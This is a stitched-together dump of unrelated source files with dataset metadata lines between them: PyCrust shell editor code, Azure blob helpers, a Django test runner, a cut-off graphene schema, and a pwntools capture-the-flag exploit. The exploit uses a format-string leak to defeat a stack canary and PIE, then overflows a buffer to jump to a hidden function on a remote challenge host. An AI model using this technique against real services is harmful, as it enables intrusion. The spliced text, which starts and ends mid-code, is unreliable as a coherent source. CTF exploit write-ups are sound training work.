if self.AutoCompActive(): self.AutoCompCancel()
if self.CallTipActive(): self.CallTipCancel()
if (not self.more and
(self.GetTextRange(self.promptPosEnd,
self.GetCurrentPos()) == '')):
self.historyShow()
else:
self.insertLineBreak()
# If the auto-complete window is up let it do its thing.
elif self.AutoCompActive():
event.Skip()
# Let Ctrl-Alt-* get handled normally.
elif controlDown and altDown:
event.Skip()
# Clear the current, unexecuted command.
elif key == WXK_ESCAPE:
if self.CallTipActive():
event.Skip()
else:
self.clearCommand()
# Cut to the clipboard.
elif (controlDown and key in (ord('X'), ord('x'))) \
or (shiftDown and key == WXK_DELETE):
self.Cut()
# Copy to the clipboard.
elif controlDown and not shiftDown \
and key in (ord('C'), ord('c'), WXK_INSERT):
self.Copy()
# Copy to the clipboard, including prompts.
elif controlDown and shiftDown \
and key in (ord('C'), ord('c'), WXK_INSERT):
self.CopyWithPrompts()
# Home needs to be aware of the prompt.
elif key == WXK_HOME:
home = self.promptPosEnd
if currpos > home:
self.SetCurrentPos(home)
if not selecting and not shiftDown:
self.SetAnchor(home)
self.EnsureCaretVisible()
else:
event.Skip()
#
# The following handlers modify text, so we need to see if there
# is a selection that includes text prior to the prompt.
#
# Don't modify a selection with text prior to the prompt.
elif selecting and key not in NAVKEYS and not self.CanEdit():
pass
# Paste from the clipboard.
elif (controlDown and not shiftDown \
and key in (ord('V'), ord('v'))) \
or (shiftDown and not controlDown and key == WXK_INSERT):
self.Paste()
# Paste from the clipboard, run commands.
elif controlDown and shiftDown \
and key in (ord('V'), ord('v')):
self.PasteAndRun()
# Replace with the previous command from the history buffer.
elif (controlDown and key == WXK_UP) \
or (altDown and key in (ord('P'), ord('p'))):
self.OnHistoryReplace(step=+1)
# Replace with the next command from the history buffer.
elif (controlDown and key == WXK_DOWN) \
or (altDown and key in (ord('N'), ord('n'))):
self.OnHistoryReplace(step=-1)
# Insert the previous command from the history buffer.
elif (shiftDown and key == WXK_UP) and self.CanEdit():
self.OnHistoryInsert(step=+1)
# Insert the next command from the history buffer.
elif (shiftDown and key == WXK_DOWN) and self.CanEdit():
self.OnHistoryInsert(step=-1)
# Search up the history for the text in front of the cursor.
elif key == WXK_F8:
self.OnHistorySearch()
# Show all history entries that match the command typed so far:
elif key == WXK_F9:
self.historyShow(self.getCommand(rstrip=0))
# Don't backspace over the latest non-continuation prompt.
elif key == WXK_BACK:
if selecting and self.CanEdit():
event.Skip()
elif currpos > self.promptPosEnd:
event.Skip()
# Only allow these keys after the latest prompt.
elif key == WXK_DELETE:
if self.CanEdit():
event.Skip()
elif key == WXK_TAB:
if self.CanEdit() and not self.topLevelComplete():
event.Skip()
# Don't toggle between insert mode and overwrite mode.
elif key == WXK_INSERT:
pass
# Don't allow line deletion.
elif controlDown and key in (ord('L'), ord('l')):
pass
# Don't allow line transposition.
elif controlDown and key in (ord('T'), ord('t')):
pass
# Basic navigation keys should work anywhere.
elif key in NAVKEYS:
event.Skip()
# Protect the readonly portion of the shell.
elif not self.CanEdit():
pass
else:
event.Skip()
def clearCommand(self):
"""Delete the current, unexecuted command."""
startpos = self.promptPosEnd
endpos = self.GetTextLength()
self.SetSelection(startpos, endpos)
self.ReplaceSelection('')
self.more = 0
def OnHistoryReplace(self, step):
"""Replace with the previous/next command from the history buffer."""
if not self.historyPrefix:
self.historyPrefix = 1
self.historyMatches = None
prefix = self.getCommand(rstrip=0)
n = len(prefix)
if n > 0:
self.historyMatches = matches = []
for command in self.history:
if command[:n] == prefix and command not in matches:
matches.append(command)
self.clearCommand()
self.replaceFromHistory(step, self.historyMatches)
def replaceFromHistory(self, step, history=None):
"""Replace selection with command from the history buffer."""
self.ReplaceSelection('')
if history is None:
history = self.history
newindex = self.historyIndex + step
if -1 <= newindex <= len(history):
self.historyIndex = newindex
if 0 <= newindex <= len(history)-1:
command = history[self.historyIndex]
command = command.replace('\n', os.linesep + sys.ps2)
self.ReplaceSelection(command)
def OnHistoryInsert(self, step):
"""Insert the previous/next command from the history buffer."""
if not self.CanEdit():
return
startpos = self.GetCurrentPos()
self.replaceFromHistory(step)
endpos = self.GetCurrentPos()
self.SetSelection(endpos, startpos)
def OnHistorySearch(self):
"""Search up the history buffer for the text in front of the cursor."""
if not self.CanEdit():
return
startpos = self.GetCurrentPos()
# The text up to the cursor is what we search for.
numCharsAfterCursor = self.GetTextLength() - startpos
searchText = self.getCommand(rstrip=0)
if numCharsAfterCursor > 0:
searchText = searchText[:-numCharsAfterCursor]
if not searchText:
return
# Search upwards from the current history position and loop back
# to the beginning if we don't find anything.
if (self.historyIndex <= -1) \
or (self.historyIndex >= len(self.history)-2):
searchOrder = list(range(len(self.history)))
else:
searchOrder = list(range(self.historyIndex+1, len(self.history))) + \
list(range(self.historyIndex))
for i in searchOrder:
command = self.history[i]
if command[:len(searchText)] == searchText:
# Replace the current selection with the one we've found.
self.ReplaceSelection(command[len(searchText):])
endpos = self.GetCurrentPos()
self.SetSelection(endpos, startpos)
# We've now warped into middle of the history.
self.historyIndex = i
break
def setStatusText(self, text):
"""Display status information."""
# This method will most likely be replaced by the enclosing app
# to do something more interesting, like write to a status bar.
print(text)
def insertLineBreak(self):
"""Insert a new line break."""
if self.CanEdit():
self.write(os.linesep)
self.more = 1
self.prompt()
def processLine(self):
"""Process the line of text at which the user hit Enter."""
# The user hit ENTER and we need to decide what to do. They could be
# sitting on any line in the shell.
thepos = self.GetCurrentPos()
startpos = self.promptPosEnd
endpos = self.GetTextLength()
# If they hit RETURN inside the current command, execute the command.
if self.CanEdit():
self.SetCurrentPos(endpos)
self.interp.more = 0
command = self.GetTextRange(startpos, endpos)
lines = command.split(os.linesep + sys.ps2)
lines = [line.rstrip() for line in lines]
command = '\n'.join(lines)
if self.reader.isreading:
if not command:
# Match the behavior of the standard Python shell when
# the user hits return without entering a value.
command = '\n'
self.reader.input = command
self.write(os.linesep)
else:
self.push(command)
# Or replace the current command with the other command.
else:
# If the line contains a command (even an invalid one).
if self.getCommand(rstrip=0):
command = self.getMultilineCommand()
self.clearCommand()
self.write(command)
# Otherwise, put the cursor back where we started.
else:
self.SetCurrentPos(thepos)
self.SetAnchor(thepos)
def getMultilineCommand(self, rstrip=1):
"""Extract a multi-line command from the editor.
The command may not necessarily be valid Python syntax."""
# XXX Need to extract real prompts here. Need to keep track of the
# prompt every time a command is issued.
ps1 = str(sys.ps1)
ps1size = len(ps1)
ps2 = str(sys.ps2)
ps2size = len(ps2)
# This is a total hack job, but it works.
text = self.GetCurLine()[0]
line = self.GetCurrentLine()
while text[:ps2size] == ps2 and line > 0:
line -= 1
self.GotoLine(line)
text = self.GetCurLine()[0]
if text[:ps1size] == ps1:
line = self.GetCurrentLine()
self.GotoLine(line)
startpos = self.GetCurrentPos() + ps1size
line += 1
self.GotoLine(line)
while self.GetCurLine()[0][:ps2size] == ps2:
line += 1
self.GotoLine(line)
stoppos = self.GetCurrentPos()
command = self.GetTextRange(startpos, stoppos)
command = command.replace(os.linesep + sys.ps2, '\n')
command = command.rstrip()
command = command.replace('\n', os.linesep + sys.ps2)
else:
command = ''
if rstrip:
command = command.rstrip()
return command
def getCommand(self, text=None, rstrip=1):
"""Extract a command from text which may include a shell prompt.
The command may not necessarily be valid Python syntax."""
if not text:
text = self.GetCurLine()[0]
# Strip the prompt off the front of text leaving just the command.
command = self.lstripPrompt(text)
if command == text:
command = '' # Real commands have prompts.
if rstrip:
command = command.rstrip()
return command
def lstripPrompt(self, text):
"""Return text without a leading prompt."""
ps1 = str(sys.ps1)
ps1size = len(ps1)
ps2 = str(sys.ps2)
ps2size = len(ps2)
# Strip the prompt off the front of text.
if text[:ps1size] == ps1:
text = text[ps1size:]
elif text[:ps2size] == ps2:
text = text[ps2size:]
return text
def push(self, command):
"""Send command to the interpreter for execution."""
self.write(os.linesep)
busy = wxBusyCursor()
self.more = self.interp.push(command)
del busy
if not self.more:
self.addHistory(command.rstrip())
for handler in self.handlers:
handler()
self.prompt()
def addHistory(self, command):
"""Add command to the command history."""
# Reset the history position.
self.historyIndex = -1
self.historyPrefix = 0
# Insert this command into the history, unless it's a blank
# line or the same as the last command.
if command != '' \
and (len(self.history) == 0 or command != self.history[0]):
self.history.insert(0, command)
def write(self, text):
"""Display text in the shell.
Replace line endings with OS-specific endings."""
text = self.fixLineEndings(text)
self.AddText(text)
self.EnsureCaretVisible()
def fixLineEndings(self, text):
"""Return text with line endings replaced by OS-specific endings."""
lines = text.split('\r\n')
for l in range(len(lines)):
chunks = lines[l].split('\r')
for c in range(len(chunks)):
chunks[c] = os.linesep.join(chunks[c].split('\n'))
lines[l] = os.linesep.join(chunks)
text = os.linesep.join(lines)
return text
def prompt(self):
"""Display appropriate prompt for the context, either ps1, ps2 or ps3.
If this is a continuation line, autoindent as necessary."""
isreading = self.reader.isreading
skip = 0
if isreading:
prompt = str(sys.ps3)
elif self.more:
prompt = str(sys.ps2)
else:
prompt = str(sys.ps1)
pos = self.GetCurLine()[1]
if pos > 0:
if isreading:
skip = 1
else:
self.write(os.linesep)
if not self.more:
self.promptPosStart = self.GetCurrentPos()
if not skip:
self.write(prompt)
if not self.more:
self.promptPosEnd = self.GetCurrentPos()
# Keep the undo feature from undoing previous responses.
self.EmptyUndoBuffer()
# XXX Add some autoindent magic here if more.
if self.more:
self.write(' '*4) # Temporary hack indentation.
self.EnsureCaretVisible()
self.ScrollToColumn(0)
def readline(self):
"""Replacement for stdin.readline()."""
input = ''
reader = self.reader
reader.isreading = 1
self.prompt()
try:
while not reader.input:
wxYield()
input = reader.input
finally:
reader.input = ''
reader.isreading = 0
return input
def raw_input(self, prompt=''):
"""Return string based on user input."""
if prompt:
self.write(prompt)
return self.readline()
def ask(self, prompt='Please enter your response:'):
"""Get response from the user using a dialog box."""
dialog = wxTextEntryDialog(None, prompt, \
'Input Dialog (Raw)', '')
try:
if dialog.ShowModal() == wxID_OK:
text = dialog.GetValue()
return text
finally:
dialog.Destroy()
return ''
def pause(self):
"""Halt execution pending a response from the user."""
self.ask('Press enter to continue:')
def clear(self):
"""Delete all text from the shell."""
self.ClearAll()
def run(self, command, prompt=1, verbose=1):
"""Execute command within the shell as if it was typed in directly.
>>> shell.run('print "this"')
>>> print "this"
this
>>>
"""
# Go to the very bottom of the text.
endpos = self.GetTextLength()
self.SetCurrentPos(endpos)
command = command.rstrip()
if prompt: self.prompt()
if verbose: self.write(command)
self.push(command)
def runfile(self, filename):
"""Execute all commands in file as if they were typed into the shell."""
file = open(filename)
try:
self.prompt()
for command in file.readlines():
if command[:6] == 'shell.': # Run shell methods silently.
self.run(command, prompt=0, verbose=0)
else:
self.run(command, prompt=0, verbose=1)
finally:
file.close()
def autoCompleteShow(self, command):
"""Display auto-completion popup list."""
list = self.interp.getAutoCompleteList(command,
includeMagic=self.autoCompleteIncludeMagic,
includeSingle=self.autoCompleteIncludeSingle,
includeDouble=self.autoCompleteIncludeDouble)
if list:
options = '\n'.join(list)
offset = 0
self.AutoCompShow(offset, options)
def autoCallTipShow(self, command):
"""Display argument spec and docstring in a popup bubble thingie."""
if self.CallTipActive: self.CallTipCancel()
(name, argspec, tip) = self.interp.getCallTip(command)
if argspec:
startpos = self.GetCurrentPos()
self.write(argspec + ')')
endpos = self.GetCurrentPos()
self.SetSelection(endpos, startpos)
if tip:
curpos = self.GetCurrentPos()
tippos = curpos - (len(name) + 1)
fallback = curpos - self.GetColumn(curpos)
# In case there isn't enough room, only go back to the fallback.
tippos = max(tippos, fallback)
self.CallTipShow(tippos, tip)
def historyShow(self, prefix=''):
items = []
for item in self.history:
item = item.replace( '\n', '\\n' )
if (prefix == item[:len(prefix)]) and item not in items:
items.append(item)
self.UserListShow(1, '\n'.join(items))
def OnHistorySelected(self, event):
command = event.GetText()
if command.find('\\n') >= 0:
command += '\\n'
command = command.replace( '\\n', os.linesep + sys.ps2)
self.clearCommand()
self.write(command)
# Process the command if the 'Enter' key was pressed:
key = event.GetKey()
if key == 28 or key == 1241712: # Is there a 'name' for the Enter key?
self.processLine()
def topLevelComplete(self):
command = self.getCommand(rstrip=0)
completions = self.interp.getTopLevelCompletions(command)
if len(completions) == 0:
return 0
if len(completions) == 1:
self.write(completions[0][len(command):])
else:
self.AutoCompShow(len(command), '\n'.join(completions))
return 1
def writeOut(self, text):
"""Replacement for stdout."""
self.write(text)
def writeErr(self, text):
"""Replacement for stderr."""
self.write(text)
def redirectStdin(self, redirect=1):
"""If redirect is true then sys.stdin will come from the shell."""
if redirect:
sys.stdin = self.reader
else:
sys.stdin = self.stdin
def redirectStdout(self, redirect=1):
"""If redirect is true then sys.stdout will go to the shell."""
if redirect:
sys.stdout = PseudoFileOut(self.writeOut)
else:
sys.stdout = self.stdout
def redirectStderr(self, redirect=1):
"""If redirect is true then sys.stderr will go to the shell."""
if redirect:
sys.stderr = PseudoFileErr(self.writeErr)
else:
sys.stderr = self.stderr
def CanCut(self):
"""Return true if text is selected and can be cut."""
if self.GetSelectionStart() != self.GetSelectionEnd() \
and self.GetSelectionStart() >= self.promptPosEnd \
and self.GetSelectionEnd() >= self.promptPosEnd:
return 1
else:
return 0
def CanCopy(self):
"""Return true if text is selected and can be copied."""
return self.GetSelectionStart() != self.GetSelectionEnd()
def CanPaste(self):
"""Return true if a paste should succeed."""
if self.CanEdit() and \
(wxStyledTextCtrl.CanPaste(self) or \
wxTheClipboard.IsSupported(PythonObject)):
return 1
else:
return 0
def CanEdit(self):
"""Return true if editing should succeed."""
if self.GetSelectionStart() != self.GetSelectionEnd():
if self.GetSelectionStart() >= self.promptPosEnd \
and self.GetSelectionEnd() >= self.promptPosEnd:
return 1
else:
return 0
else:
return self.GetCurrentPos() >= self.promptPosEnd
def Cut(self):
"""Remove selection and place it on the clipboard."""
if self.CanCut() and self.CanCopy():
if self.AutoCompActive(): self.AutoCompCancel()
if self.CallTipActive: self.CallTipCancel()
self.Copy()
self.ReplaceSelection('')
def Copy(self):
"""Copy selection and place it on the clipboard."""
if self.CanCopy():
command = self.GetSelectedText()
command = command.replace(os.linesep + sys.ps2, os.linesep)
command = command.replace(os.linesep + sys.ps1, os.linesep)
command = self.lstripPrompt(text=command)
data = wxTextDataObject(command)
if wxTheClipboard.Open():
wxTheClipboard.SetData(data)
wxTheClipboard.Close()
def CopyWithPrompts(self):
"""Copy selection, including prompts, and place it on the clipboard."""
if self.CanCopy():
command = self.GetSelectedText()
data = wxTextDataObject(command)
if wxTheClipboard.Open():
wxTheClipboard.SetData(data)
wxTheClipboard.Close()
def Paste(self):
"""Replace selection with clipboard contents."""
if self.CanPaste() and wxTheClipboard.Open():
try:
if wxTheClipboard.IsSupported(wxDataFormat(wxDF_TEXT)):
data = wxTextDataObject()
if wxTheClipboard.GetData(data):
self.ReplaceSelection('')
command = data.GetText()
command = command.rstrip()
command = self.fixLineEndings(command)
command = self.lstripPrompt(text=command)
command = command.replace(os.linesep + sys.ps2, '\n')
command = command.replace(os.linesep, '\n')
command = command.replace('\n', os.linesep + sys.ps2)
self.write(command)
if wxTheClipboard.IsSupported(PythonObject) and \
self.python_obj_paste_handler is not None:
# note that the presence of a PythonObject on the
# clipboard is really just a signal to grab the data
# from our singleton clipboard instance
data = enClipboard.data
self.python_obj_paste_handler(data)
finally:
wxTheClipboard.Close()
return
def PasteAndRun(self):
"""Replace selection with clipboard contents, run commands."""
if wxTheClipboard.Open():
if wxTheClipboard.IsSupported(wxDataFormat(wxDF_TEXT)):
data = wxTextDataObject()
if wxTheClipboard.GetData(data):
endpos = self.GetTextLength()
self.SetCurrentPos(endpos)
startpos = self.promptPosEnd
self.SetSelection(startpos, endpos)
self.ReplaceSelection('')
text = data.GetText()
text = text.strip()
text = self.fixLineEndings(text)
text = self.lstripPrompt(text=text)
text = text.replace(os.linesep + sys.ps1, '\n')
text = text.replace(os.linesep + sys.ps2, '\n')
text = text.replace(os.linesep, '\n')
lines = text.split('\n')
commands = []
command = ''
for line in lines:
if line.strip() != '' and line.lstrip() == line:
# New command.
if command:
# Add the previous command to the list.
commands.append(command)
# Start a new command, which may be multiline.
command = line
else:
# Multiline command. Add to the command.
command += '\n'
command += line
commands.append(command)
for command in commands:
command = command.replace('\n', os.linesep + sys.ps2)
self.write(command)
self.processLine()
wxTheClipboard.Close()
def wrap(self, wrap=1):
"""Sets whether text is word wrapped."""
try:
self.SetWrapMode(wrap)
except AttributeError:
return 'Wrapping is not available in this version of PyCrust.'
def zoom(self, points=0):
"""Set the zoom level.
This number of points is added to the size of all fonts.
It may be positive to magnify or negative to reduce."""
self.SetZoom(points)
wxID_SELECTALL = wxNewId()
ID_AUTOCOMP = wxNewId()
ID_AUTOCOMP_SHOW = wxNewId()
ID_AUTOCOMP_INCLUDE_MAGIC = wxNewId()
ID_AUTOCOMP_INCLUDE_SINGLE = wxNewId()
ID_AUTOCOMP_INCLUDE_DOUBLE = wxNewId()
ID_CALLTIPS = wxNewId()
ID_CALLTIPS_SHOW = wxNewId()
ID_FILLING = wxNewId()
ID_FILLING_AUTO_UPDATE = wxNewId()
ID_FILLING_SHOW_METHODS = wxNewId()
ID_FILLING_SHOW_CLASS = wxNewId()
ID_FILLING_SHOW_DICT = wxNewId()
ID_FILLING_SHOW_DOC = wxNewId()
ID_FILLING_SHOW_MODULE = wxNewId()
class ShellMenu:
"""Mixin class to add standard menu items."""
def createMenus(self):
m = self.fileMenu = wxMenu()
m.AppendSeparator()
m.Append(wxID_EXIT, 'E&xit', 'Exit PyCrust')
m = self.editMenu = wxMenu()
m.Append(wxID_UNDO, '&Undo \tCtrl+Z', 'Undo the last action')
m.Append(wxID_REDO, '&Redo \tCtrl+Y', 'Redo the last undone action')
m.AppendSeparator()
m.Append(wxID_CUT, 'Cu&t \tCtrl+X', 'Cut the selection')
m.Append(wxID_COPY, '&Copy \tCtrl+C', 'Copy the selection')
m.Append(wxID_PASTE, '&Paste \tCtrl+V', 'Paste')
m.AppendSeparator()
m.Append(wxID_CLEAR, 'Cle&ar', 'Delete the selection')
m.Append(wxID_SELECTALL, 'Select A&ll', 'Select all text')
m = self.autocompMenu = wxMenu()
m.Append(ID_AUTOCOMP_SHOW, 'Show Auto Completion', \
'Show auto completion during dot syntax', 1)
m.Append(ID_AUTOCOMP_INCLUDE_MAGIC, 'Include Magic Attributes', \
'Include attributes visible to __getattr__ and __setattr__', 1)
m.Append(ID_AUTOCOMP_INCLUDE_SINGLE, 'Include Single Underscores', \
'Include attibutes prefixed by a single underscore', 1)
m.Append(ID_AUTOCOMP_INCLUDE_DOUBLE, 'Include Double Underscores', \
'Include attibutes prefixed by a double underscore', 1)
m = self.calltipsMenu = wxMenu()
m.Append(ID_CALLTIPS_SHOW, 'Show Call Tips', \
'Show call tips with argument specifications', 1)
m = self.optionsMenu = wxMenu()
m.AppendMenu(ID_AUTOCOMP, '&Auto Completion', self.autocompMenu, \
'Auto Completion Options')
m.AppendMenu(ID_CALLTIPS, '&Call Tips', self.calltipsMenu, \
'Call Tip Options')
if hasattr( self, 'crust' ):
fm = self.fillingMenu = wxMenu()
fm.Append(ID_FILLING_AUTO_UPDATE, 'Automatic Update',
'Automatically update tree view after each command', 1)
fm.Append(ID_FILLING_SHOW_METHODS, 'Show Methods',
'Show methods and functions in the tree view', 1)
fm.Append(ID_FILLING_SHOW_CLASS, 'Show __class__',
'Show __class__ entries in the tree view', 1)
fm.Append(ID_FILLING_SHOW_DICT, 'Show __dict__',
'Show __dict__ entries in the tree view', 1)
fm.Append(ID_FILLING_SHOW_DOC, 'Show __doc__',
'Show __doc__ entries in the tree view', 1)
fm.Append(ID_FILLING_SHOW_MODULE, 'Show __module__',
'Show __module__ entries in the tree view', 1)
m.AppendMenu(ID_FILLING, '&Filling', fm, 'Filling Options')
m = self.helpMenu = wxMenu()
m.AppendSeparator()
m.Append(wxID_ABOUT, '&About...', 'About PyCrust')
b = self.menuBar = wxMenuBar()
b.Append(self.fileMenu, '&File')
b.Append(self.editMenu, '&Edit')
b.Append(self.optionsMenu, '&Options')
b.Append(self.helpMenu, '&Help')
self.SetMenuBar(b)
EVT_MENU(self, wxID_EXIT, self.OnExit)
EVT_MENU(self, wxID_UNDO, self.OnUndo)
EVT_MENU(self, wxID_REDO, self.OnRedo)
EVT_MENU(self, wxID_CUT, self.OnCut)
EVT_MENU(self, wxID_COPY, self.OnCopy)
EVT_MENU(self, wxID_PASTE, self.OnPaste)
EVT_MENU(self, wxID_CLEAR, self.OnClear)
EVT_MENU(self, wxID_SELECTALL, self.OnSelectAll)
EVT_MENU(self, wxID_ABOUT, self.OnAbout)
EVT_MENU(self, ID_AUTOCOMP_SHOW, \
self.OnAutoCompleteShow)
EVT_MENU(self, ID_AUTOCOMP_INCLUDE_MAGIC, \
self.OnAutoCompleteIncludeMagic)
EVT_MENU(self, ID_AUTOCOMP_INCLUDE_SINGLE, \
self.OnAutoCompleteIncludeSingle)
EVT_MENU(self, ID_AUTOCOMP_INCLUDE_DOUBLE, \
self.OnAutoCompleteIncludeDouble)
EVT_MENU(self, ID_CALLTIPS_SHOW, \
self.OnCallTipsShow)
EVT_UPDATE_UI(self, wxID_UNDO, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_REDO, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_CUT, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_COPY, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_PASTE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_CLEAR, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_SHOW, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_INCLUDE_MAGIC, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_INCLUDE_SINGLE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_INCLUDE_DOUBLE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_CALLTIPS_SHOW, self.OnUpdateMenu)
if hasattr( self, 'crust' ):
EVT_MENU(self, ID_FILLING_AUTO_UPDATE, self.OnFillingAutoUpdate)
EVT_MENU(self, ID_FILLING_SHOW_METHODS, self.OnFillingShowMethods)
EVT_MENU(self, ID_FILLING_SHOW_CLASS, self.OnFillingShowClass)
EVT_MENU(self, ID_FILLING_SHOW_DICT, self.OnFillingShowDict)
EVT_MENU(self, ID_FILLING_SHOW_DOC, self.OnFillingShowDoc)
EVT_MENU(self, ID_FILLING_SHOW_MODULE, self.OnFillingShowModule)
EVT_UPDATE_UI(self, ID_FILLING_AUTO_UPDATE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_METHODS, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_CLASS, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_DICT, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_DOC, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_MODULE, self.OnUpdateMenu)
def OnExit(self, event):
self.Close(True)
def OnUndo(self, event):
self.shell.Undo()
def OnRedo(self, event):
self.shell.Redo()
def OnCut(self, event):
self.shell.Cut()
def OnCopy(self, event):
self.shell.Copy()
def OnPaste(self, event):
self.shell.Paste()
def OnClear(self, event):
self.shell.Clear()
def OnSelectAll(self, event):
self.shell.SelectAll()
def OnAbout(self, event):
"""Display an About PyCrust window."""
import sys
title = 'About PyCrust'
text = 'PyCrust %s\n\n' % VERSION + \
'Yet another Python shell, only flakier.\n\n' + \
'Half-baked by <NAME>,\n' + \
'the other half is still in the oven.\n\n' + \
'Shell Revision: %s\n' % self.shell.revision + \
'Interpreter Revision: %s\n\n' % self.shell.interp.revision + \
'Python Version: %s\n' % sys.version.split()[0] + \
'wxPython Version: %s\n' % wx.__version__ + \
'Platform: %s\n' % sys.platform
dialog = wxMessageDialog(self, text, title, wxOK | wxICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def OnAutoCompleteShow(self, event):
self.shell.autoComplete = event.IsChecked()
def OnAutoCompleteIncludeMagic(self, event):
self.shell.autoCompleteIncludeMagic = event.IsChecked()
def OnAutoCompleteIncludeSingle(self, event):
self.shell.autoCompleteIncludeSingle = event.IsChecked()
def OnAutoCompleteIncludeDouble(self, event):
self.shell.autoCompleteIncludeDouble = event.IsChecked()
def OnCallTipsShow(self, event):
self.shell.autoCallTip = event.IsChecked()
def OnFillingAutoUpdate(self, event):
tree = self.crust.filling.fillingTree
tree.autoUpdate = event.IsChecked()
tree.if_autoUpdate()
def OnFillingShowMethods(self, event):
tree = self.crust.filling.fillingTree
tree.showMethods = event.IsChecked()
tree.update()
def OnFillingShowClass(self, event):
tree = self.crust.filling.fillingTree
tree.showClass = event.IsChecked()
tree.update()
def OnFillingShowDict(self, event):
tree = self.crust.filling.fillingTree
tree.showDict = event.IsChecked()
tree.update()
def OnFillingShowDoc(self, event):
tree = self.crust.filling.fillingTree
tree.showDoc = event.IsChecked()
tree.update()
def OnFillingShowModule(self, event):
tree = self.crust.filling.fillingTree
tree.showModule = event.IsChecked()
tree.update()
def OnUpdateMenu(self, event):
"""Update menu items based on current status."""
id = event.GetId()
if id == wxID_UNDO:
event.Enable(self.shell.CanUndo())
elif id == wxID_REDO:
event.Enable(self.shell.CanRedo())
elif id == wxID_CUT:
event.Enable(self.shell.CanCut())
elif id == wxID_COPY:
event.Enable(self.shell.CanCopy())
elif id == wxID_PASTE:
event.Enable(self.shell.CanPaste())
elif id == wxID_CLEAR:
event.Enable(self.shell.CanCut())
elif id == ID_AUTOCOMP_SHOW:
event.Check(self.shell.autoComplete)
elif id == ID_AUTOCOMP_INCLUDE_MAGIC:
event.Check(self.shell.autoCompleteIncludeMagic)
elif id == ID_AUTOCOMP_INCLUDE_SINGLE:
event.Check(self.shell.autoCompleteIncludeSingle)
elif id == ID_AUTOCOMP_INCLUDE_DOUBLE:
event.Check(self.shell.autoCompleteIncludeDouble)
elif id == ID_CALLTIPS_SHOW:
event.Check(self.shell.autoCallTip)
elif id == ID_FILLING_AUTO_UPDATE:
event.Check(self.crust.filling.fillingTree.autoUpdate)
elif id == ID_FILLING_SHOW_METHODS:
event.Check(self.crust.filling.fillingTree.showMethods)
elif id == ID_FILLING_SHOW_CLASS:
event.Check(self.crust.filling.fillingTree.showClass)
elif id == ID_FILLING_SHOW_DICT:
event.Check(self.crust.filling.fillingTree.showDict)
elif id == ID_FILLING_SHOW_DOC:
event.Check(self.crust.filling.fillingTree.showDoc)
elif id == ID_FILLING_SHOW_MODULE:
event.Check(self.crust.filling.fillingTree.showModule)
| 1.703125 | 2 |
redteamvillage2021/pie/exploit.py | nhtri2003gmail/ctf-write-ups | 101 | 12798034 | <gh_stars>100-1000
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./pie')
if args.REMOTE:
p = remote('pwnremote.threatsims.com', 9002)
else:
p = process(binary.path)
p.sendlineafter('?\n','%11$10p%15$10p')
p.recvuntil('command: ')
canary = int(p.recv(10),16)
log.info('canary: ' + hex(canary))
main = int(p.recv(10),16) - 95
log.info('main: ' + hex(main))
binary.address = main - binary.sym.main
log.info('binary.address: ' + hex(binary.address))
payload = b''
payload += (0x21 - 0x10) * b'A'
payload += p32(canary)
payload += (0x21 - len(payload)) * b'B'
payload += p32(binary.sym.helperfunc)
p.sendlineafter('?',payload)
p.interactive()
| 1.859375 | 2 |
src/data/azure_storage_utils.py | lukk60/RETrends | 0 | 12798035 | # Utility functions to access azure data storage
import json, os
from azure.storage.blob import BlockBlobService, PublicAccess
def load_text_file(containerName, blobName, accountName, accountKey):
'''
load the file specified from azure block blob storage. if the file is not
found return an empty dictionary
Parameters
----------
containerName: str
container in storage account to open
blobName: str
name of blob in container to open
accountName: str
name of storage account
accountKey
access key for storage account
Returns
-------
dictionary
'''
# Create BlockBlockService
block_blob_service = BlockBlobService(
account_name=accountName, account_key=accountKey
)
# try loading data from blob store. if blob is not found return empty dict
try:
res = block_blob_service.get_blob_to_text(containerName, blobName)
blobData = json.loads(res.content)
except:
blobData = {}
return blobData
def save_text_file(data, containerName, blobName, accountName, accountKey):
'''
save a textfile to azure block blob storage.
Parameters
----------
data: str
(text)data to upload
containerName: str
container in storage account
blobName: str
name of blob in container
accountName: str
name of storage account
accountKey
access key for storage account
Returns
-------
'''
# Create BlockBlockService
block_blob_service = BlockBlobService(
account_name=accountName, account_key=accountKey
)
block_blob_service.create_blob_from_text(containerName, blobName, data)
| 3.203125 | 3 |
run_tests.py | wsmith323/constantmodel | 2 | 12798036 | <filename>run_tests.py
#!/usr/bin/env python
import os
import subprocess
import sys
def install_dependencies():
print("\nInstalling test dependencies...\n")
try:
subprocess.check_output("pip install -r test_requirements.txt", shell=True,
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as exc:
print("ERROR: Test dependency installation failed.\n{}\n".format(exc.output.decode()))
return False
else:
print("Test dependency installation successful.\n")
return True
def run_django_tests():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_test_app.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv + ['test'])
if __name__ == '__main__':
if install_dependencies():
run_django_tests()
| 2.0625 | 2 |
booksite/booksite/book/schema.py | LoyalWilliams/bookspider | 39 | 12798037 | <reponame>LoyalWilliams/bookspider<filename>booksite/booksite/book/schema.py
# -*- coding: utf-8 -*-
from graphene import relay, ObjectType, AbstractType
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from .models import Book, BookPage
class BookPageNode(DjangoObjectType):
class Meta:
model = BookPage
filter_fields = {
'book_number': ['exact'],
'page_number': ['exact'],
}
interfaces = (relay.Node, )
class BookNode(DjangoObjectType):
class Meta:
model = Book
filter_fields = {
